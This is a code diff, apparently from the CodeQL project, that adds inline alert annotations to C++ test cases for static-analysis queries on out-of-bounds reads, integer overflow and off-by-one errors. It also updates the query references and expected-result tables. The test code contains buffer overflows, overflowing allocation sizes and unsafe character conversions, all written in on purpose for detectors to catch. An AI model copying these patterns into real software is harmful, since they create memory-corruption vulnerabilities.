@@ static void badTest2(const char* ptr) int ret; int len; len = strlen(ptr); - for (wchar_t wc; (ret = mbtowc(&wc, ptr, sizeof(wchar_t))) > 0; len-=ret) { // BAD:we can get unpredictable results + for (wchar_t wc; (ret = mbtowc(&wc, ptr, sizeof(wchar_t))) > 0; len-=ret) { // BAD:we can get unpredictable results // $ Alert wprintf(L"%lc", wc); ptr += ret; } @@ -103,7 +103,7 @@ static void badTest3(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, MB_CUR_MAX); // BAD + ret = mbtowc(wc, ptr, MB_CUR_MAX); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) @@ -120,7 +120,7 @@ static void badTest4(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, 16); // BAD + ret = mbtowc(wc, ptr, 16); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) @@ -137,7 +137,7 @@ static void badTest5(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, sizeof(wchar_t)); // BAD + ret = mbtowc(wc, ptr, sizeof(wchar_t)); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) @@ -155,7 +155,7 @@ static void badTest6(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && wc_len > 0) { - ret = mbtowc(wc, ptr, wc_len); // BAD + ret = mbtowc(wc, ptr, wc_len); // BAD // $ Alert if (ret <0) if (checkErrors()) { ++ptr; @@ -178,7 +178,7 @@ static void badTest7(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && wc_len > 0) { - ret = mbtowc(wc, ptr, len); // BAD + ret = mbtowc(wc, ptr, len); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) @@ -194,7 +194,7 @@ static void badTest8(const char* ptr,wchar_t *wc) int len; len = strlen(ptr); while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, len); // BAD + ret = mbtowc(wc, ptr, len); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp index d66f36d38b97..40916f0c4b75 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp @@ -25,8 +25,8 @@ void* calloc (size_t num, size_t size); void* malloc (size_t size); static void badTest1(void *src, int size) { - WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, (LPSTR)src, size, 0, 0); // BAD - MultiByteToWideChar(CP_ACP, 0, (LPCSTR)src, -1, (LPCWSTR)src, 30); // BAD + WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, (LPSTR)src, size, 0, 0); // BAD // $ Alert + MultiByteToWideChar(CP_ACP, 0, (LPCSTR)src, -1, (LPCWSTR)src, 30); // BAD // $ Alert } void goodTest2(){ wchar_t src[] = L"0123456789ABCDEF"; @@ -42,7 +42,7 @@ void goodTest2(){ static void badTest2(){ wchar_t src[] = L"0123456789ABCDEF"; char dst[16]; - WideCharToMultiByte(CP_UTF8, 0, src, -1, dst, 16, NULL, NULL); // BAD + WideCharToMultiByte(CP_UTF8, 0, src, -1, dst, 16, NULL, NULL); // BAD // $ Alert printf("%s\n", dst); } static void goodTest3(){ @@ -55,7 +55,7 @@ static void badTest3(){ char src[] = "0123456789ABCDEF"; int size = MultiByteToWideChar(CP_UTF8, 0, src,sizeof(src),NULL,0); wchar_t * dst = (wchar_t*)calloc(size + 1, 1); - MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD + MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD // $ Alert } static void goodTest4(){ char src[] = "0123456789ABCDEF"; @@ -67,13 +67,13 @@ static void badTest4(){ char src[] = "0123456789ABCDEF"; int size = MultiByteToWideChar(CP_UTF8, 0, src,sizeof(src),NULL,0); wchar_t * dst = (wchar_t*)malloc(size + 1); - MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD + MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD // $ Alert } static int goodTest5(void *src){ return WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, 0, 0, 0, 0); // GOOD } static int badTest5 (void *src) { - return WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, 0, 3, 0, 0); // BAD + return WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, 0, 3, 0, 0); // BAD // $ Alert } static void goodTest6(WCHAR *src) { @@ -90,6 +90,6 @@ static void goodTest6(WCHAR *src) static void badTest6(WCHAR *src) { char dst[5] =""; - WideCharToMultiByte(CP_ACP, 0, src, -1, dst, 260, 0, 0); // BAD + WideCharToMultiByte(CP_ACP, 0, src, -1, dst, 260, 0, 0); // BAD // $ Alert printf("%s\n", dst); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp index 65e5a9ee275f..07bf78f5f3d9 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp @@ -12,11 +12,11 @@ size_t mbsrtowcs(wchar_t *wcstr,const char *mbstr,size_t count, mbstate_t *mbsta static void badTest1(void *src, int size) { - mbstowcs((wchar_t*)src,(char*)src,size); // BAD + mbstowcs((wchar_t*)src,(char*)src,size); // BAD // $ Alert _locale_t locale; - _mbstowcs_l((wchar_t*)src,(char*)src,size,locale); // BAD + _mbstowcs_l((wchar_t*)src,(char*)src,size,locale); // BAD // $ Alert mbstate_t *mbstate; - mbsrtowcs((wchar_t*)src,(char*)src,size,mbstate); // BAD + mbsrtowcs((wchar_t*)src,(char*)src,size,mbstate); // BAD // $ Alert } static void goodTest2(){ char src[] = "0123456789ABCDEF"; @@ -32,7 +32,7 @@ static void goodTest2(){ static void badTest2(){ char src[] = "0123456789ABCDEF"; wchar_t dst[16]; - mbstowcs(dst, src,16); // BAD + mbstowcs(dst, src,16); // BAD // $ Alert printf("%s\n", dst); } static void goodTest3(){ @@ -45,7 +45,7 @@ static void badTest3(){ char src[] = "0123456789ABCDEF"; int size = mbstowcs(NULL, src,NULL); wchar_t * dst = (wchar_t*)calloc(size + 1, 1); - mbstowcs(dst, src,size+1); // BAD + mbstowcs(dst, src,size+1); // BAD // $ Alert } static void goodTest4(){ char src[] = "0123456789ABCDEF"; @@ -57,13 +57,13 @@ static void badTest4(){ char src[] = "0123456789ABCDEF"; int size = mbstowcs(NULL, src,NULL); wchar_t * dst = (wchar_t*)malloc(size + 1); - mbstowcs(dst, src,size+1); // BAD + mbstowcs(dst, src,size+1); // BAD // $ Alert } static int goodTest5(void *src){ return mbstowcs(NULL, (char*)src,NULL); // GOOD } static int badTest5 (void *src) { - return mbstowcs(NULL, (char*)src,3); // BAD + return mbstowcs(NULL, (char*)src,3); // BAD // $ Alert } static void goodTest6(void *src){ wchar_t dst[5]; @@ -77,6 +77,6 @@ static void goodTest6(void *src){ } static void badTest6(void *src){ wchar_t dst[5]; - mbstowcs(dst, (char*)src,260); // BAD + mbstowcs(dst, (char*)src,260); // BAD // $ Alert printf("%s\n", dst); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp index 662cdfc7be81..4ac5ce29fc66 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp @@ -13,7 +13,7 @@ static size_t badTest1(unsigned char *src){ int cb = 0; unsigned char dst[50]; while( cb < sizeof(dst) ) - dst[cb++]=*src++; // BAD + dst[cb++]=*src++; // BAD // $ Alert return _mbclen(dst); } static void goodTest2(unsigned char *src){ @@ -33,7 +33,7 @@ static void badTest2(unsigned char *src){ unsigned char dst[50]; while( cb < sizeof(dst) ) { - _mbccpy(dst+cb,src); // BAD + _mbccpy(dst+cb,src); // BAD // $ Alert cb+=_mbclen(src); src=_mbsinc(src); } @@ -44,5 +44,5 @@ static void goodTest3(){ } static void badTest3(){ wchar_t name[50]; - name[sizeof(name) - 1] = L'\0'; // BAD + name[sizeof(name) - 1] = L'\0'; // BAD // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected index c55008f6550c..2d714cac53e6 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected @@ -1,3 +1,13 @@ +#select +| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | +| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | +| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | +| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | +| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | +| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | +| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | edges | test.cpp:22:17:22:21 | ... * ... | test.cpp:22:17:22:21 | ... * ... | provenance | | | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | provenance | | @@ -18,13 +28,3 @@ nodes | test.cpp:45:36:45:40 | ... * ... | semmle.label | ... * ... | | test.cpp:46:36:46:40 | ... * ... | semmle.label | ... * ... | subpaths -#select -| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | -| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | -| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | -| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | -| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | -| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | -| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref index 7bb108b66280..fc48bdd1c2b3 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql +query: experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp index 3f49ebdece6f..63044b1a3a97 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp @@ -10,31 +10,31 @@ void test() int y = getAnInt(); char *buffer1 = (char *)malloc(x + y); // GOOD - char *buffer2 = (char *)malloc(x * y); // BAD + char *buffer2 = (char *)malloc(x * y); // BAD // $ Alert int *buffer3 = (int *)malloc(x * sizeof(int)); // GOOD - int *buffer4 = (int *)malloc(x * y * sizeof(int)); // BAD + int *buffer4 = (int *)malloc(x * y * sizeof(int)); // BAD // $ Alert if ((x <= 1000) && (y <= 1000)) { - char *buffer5 = (char *)malloc(x * y); // GOOD [FALSE POSITIVE] + char *buffer5 = (char *)malloc(x * y); // GOOD [FALSE POSITIVE] // $ Alert } - size_t size1 = x * y; - char *buffer5 = (char *)malloc(size1); // BAD + size_t size1 = x * y; // $ Source + char *buffer5 = (char *)malloc(size1); // BAD // $ Alert size_t size2 = x; size2 *= y; char *buffer6 = (char *)malloc(size2); // BAD [NOT DETECTED] char *buffer7 = new char[x * 10]; // GOOD - char *buffer8 = new char[x * y]; // BAD - char *buffer9 = new char[x * x]; // BAD + char *buffer8 = new char[x * y]; // BAD // $ Alert + char *buffer9 = new char[x * x]; // BAD // $ Alert } // --- custom allocators --- -void *MyMalloc1(size_t size) { return malloc(size); } // [additional detection here] +void *MyMalloc1(size_t size) { return malloc(size); } // [additional detection here] // $ Alert void *MyMalloc2(size_t size); void customAllocatorTests() @@ -42,6 +42,6 @@ void customAllocatorTests() int x = getAnInt(); int y = getAnInt(); - char *buffer1 = (char *)MyMalloc1(x * y); // BAD - char *buffer2 = (char *)MyMalloc2(x * y); // BAD + char *buffer1 = (char *)MyMalloc1(x * y); // BAD // $ Alert Source + char *buffer2 = (char *)MyMalloc2(x * y); // BAD // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref index 84f717acda79..ec83c625619a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql +query: experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp index 472c8ac0afac..ab4d7f4c2e77 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp @@ -6,17 +6,17 @@ void functionWork(char aA[10],unsigned int aUI) { int aI; aI = (aUI*8)/10; // GOOD - aI = aUI*8; // BAD + aI = aUI*8; // BAD // $ Alert aP = aA+aI; aI = (int)aUI*8; // GOOD - aL = (unsigned long)(aI*aI); // BAD + aL = (unsigned long)(aI*aI); // BAD // $ Alert aL = ((unsigned long)aI*aI); // GOOD - testCall((unsigned long)(aI*aI)); // BAD + testCall((unsigned long)(aI*aI)); // BAD // $ Alert testCall(((unsigned long)aI*aI)); // GOOD - if((unsigned long)(aI*aI) > aL) // BAD + if((unsigned long)(aI*aI) > aL) // BAD // $ Alert return; if(((unsigned long)aI*aI) > aL) // GOOD return; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref index 0873051581d9..2a390e2a518b 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-190/IfStatementAdditionOverflow.ql +query: experimental/Security/CWE/CWE-190/IfStatementAdditionOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp index 7c5ab91832e4..4734e1bba8d4 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp @@ -15,49 +15,49 @@ void test() unsigned short b1 = getAnUnsignedShort(); unsigned short c1 = getAnUnsignedShort(); - if (a+b>c) a = c-b; // BAD - if (a+b>c) { a = c-b; } // BAD - if (b+a>c) a = c-b; // BAD - if (b+a>c) { a = c-b; } // BAD - if (c>a+b) a = c-b; // BAD - if (c>a+b) { a = c-b; } // BAD - if (c>b+a) a = c-b; // BAD - if (c>b+a) { a = c-b; } // BAD + if (a+b>c) a = c-b; // BAD // $ Alert + if (a+b>c) { a = c-b; } // BAD // $ Alert + if (b+a>c) a = c-b; // BAD // $ Alert + if (b+a>c) { a = c-b; } // BAD // $ Alert + if (c>a+b) a = c-b; // BAD // $ Alert + if (c>a+b) { a = c-b; } // BAD // $ Alert + if (c>b+a) a = c-b; // BAD // $ Alert + if (c>b+a) { a = c-b; } // BAD // $ Alert - if (a+b>=c) a = c-b; // BAD - if (a+b>=c) { a = c-b; } // BAD - if (b+a>=c) a = c-b; // BAD - if (b+a>=c) { a = c-b; } // BAD - if (c>=a+b) a = c-b; // BAD - if (c>=a+b) { a = c-b; } // BAD - if (c>=b+a) a = c-b; // BAD - if (c>=b+a) { a = c-b; } // BAD + if (a+b>=c) a = c-b; // BAD // $ Alert + if (a+b>=c) { a = c-b; } // BAD // $ Alert + if (b+a>=c) a = c-b; // BAD // $ Alert + if (b+a>=c) { a = c-b; } // BAD // $ Alert + if (c>=a+b) a = c-b; // BAD // $ Alert + if (c>=a+b) { a = c-b; } // BAD // $ Alert + if (c>=b+a) a = c-b; // BAD // $ Alert + if (c>=b+a) { a = c-b; } // BAD // $ Alert - if (a+bd) a = d-b; // BAD + if (a+b>d) a = d-b; // BAD // $ Alert if (a+(double)b>c) a = c-b; // GOOD if (a+(-x)>c) a = c-(-y); // GOOD if (a+b>c) { b++; a = c-b; } // GOOD if (a+d>c) a = c-d; // GOOD if (a1+b1>c1) a1 = c1-b1; // GOOD - if (a+b<=c) { /* ... */ } else { a = c-b; } // BAD - if (a+b<=c) { return; } a = c-b; // BAD + if (a+b<=c) { /* ... */ } else { a = c-b; } // BAD // $ Alert + if (a+b<=c) { return; } a = c-b; // BAD // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected index b343a4b47ede..ec17b2bd2f4a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected @@ -1,3 +1,22 @@ +#select +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | +| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | edges | test.cpp:4:17:4:22 | call to malloc | test.cpp:4:17:4:22 | call to malloc | provenance | | | test.cpp:4:17:4:22 | call to malloc | test.cpp:6:9:6:11 | arr | provenance | | @@ -99,22 +118,3 @@ nodes | test.cpp:98:18:98:27 | test6_callee output argument [p] | semmle.label | test6_callee output argument [p] | subpaths | test.cpp:98:18:98:27 | *call to mk_array_p [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:98:18:98:27 | test6_callee output argument [p] | -#select -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | 